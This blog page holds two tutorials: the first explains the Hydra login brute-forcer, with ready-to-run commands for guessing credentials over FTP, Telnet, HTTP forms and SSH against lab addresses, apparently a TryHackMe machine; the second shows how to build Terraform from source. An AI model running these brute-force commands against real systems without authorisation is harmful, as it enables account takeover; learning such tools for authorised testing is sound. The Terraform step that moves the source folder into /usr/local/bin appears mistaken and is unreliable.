Brute Forcing With Hydra

Brute force with hydra!

What is Hydra:

Hydra is a classic, fast network logon cracker that was created by Van Hauser. It is commonly used as a network logon cracker. The tool is great since it’s both fast and have built-in support for many different protocols.

You can find the code at:
https://github.com/vanhauser-thc/thc-hydra

How to install Hydra:

Hydra comes pre-installed with Kali Linux but if you are running another distributions you can simply install it from source by running the following commands

cd /opt
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
make install

Brute force vs dictionary attack:

The differences between a pure brute force attack and a dictionary attack from a technical point of view are pretty small. A pure brute force attack tests all possible combinations while a dictionary attack uses a word list with just selected combinations, usually default passwords and real passwords from data breaches. Running attacks with word lists are usually the first step to try in hope of finding the password quick. If the password is very strong pure brute force is the way to success.

Hydra requires you to use either a single password or a word list. It’s the same with usernames, either a single username or a word list with usernames.

A great feature that Hydra provides is that you can generate a word list if you are looking for pure brute force. It can be done with parameter -x. I will show you an example in the next section.

Common general parameters with examples:

You can find all parameters with -h but I describe some of the commons ones below.

-l = single username
Example : hydra -l admin

-L = list of usernames
Example: hydra -L /usr/share/wordlists/common-usernames

-p = single password
Example: hydra -p password1

-P = list of passwords
Example: hydra -P /usr/share/wordlists/common-passwords

-s = define port (if non standard for protocol)
Example: hydra -s 1337

-o = write result to a file instead of stdout
hydra -o result.txt

-x = Brute force mode
You can run hydra -x -h to get the full help menu for brute force mode but the the logic is
-x MIN:MAX:CHARSET

So if you for example know that the password requirements are minimum 6 characters and the password needs to contain uppercase, lowercase and numbers you would probably go for:
-x 6:8:aA1
This will generate a list of all possible password that are between 6-8 characters and contains uppercase, lowercase and numbers that will be used for your attack. Example:

hydra -x 6:8:aA1 -l root 192.168.0.1 ssh

Examples:

Some examples on how you can use Hydra for different protocols.

FTP:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ftp -o ftp-result.txt
TELNET:
hydra -L /usr/share/wordlists/common-usernames -P /usr/share/wordlists/rockyou.txt 192.168.13.37 telnet
HTTP Forms:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.13.37 http-post-form “/hiddenlogin/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed”
SSH:
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.13.37 ssh -o ssh-result.txt
In this example I used the Hydra machine from TryHackMe.com to demonstrate the example.

I hope this guide was helpful. If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Install Terraform in Linux

Terraform is an open-source software tool for Infrastructure as Code (IaC). The tool helps users to define and provision a cloud infrastructure with code. This guide will guide you on how to install Terraform on Linux.

You can either install Terraform from pre-compiled binary or you can also compile it from source and that this guide will help you with installing it from source.

The first step is to clone Terraforms repository from github. I prefer to install all my tools to /opt so thats what I do here but you can download to the location you want.

cd /opt
git clone https://github.com/hashicorp/terraform.git

Next we need to move into the terraform folder and compile the binary, to do this you will need to have golang installed, if you don’t have it already you can follow my guide on how to install Golang.

cd terraform
go install

The last step that I recommend you to do is to make sure that terraform is available in your PATH environmental variable.

First check view your PATH with

echo $PATH

Now we just need to move the terraform binary to one of the locations, I choose /usr/local/bin

mv /opt/terraform /usr/local/bin/

Now you have terraform installed. You can verify that is correctly installed by running:

terraform -help 
#or
terraform -version

The last thing I will recommend you to do is to enable tab completion so you can auto complete your terraform commands. You can do it by running the following command.

terraform -install-autocomplete

That’s it. Now you are ready to use this awesome IaC-tool. If you are interested in taking the Terraform Associate certification I recommend you to read my review of the exam.

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

Copyright © 2019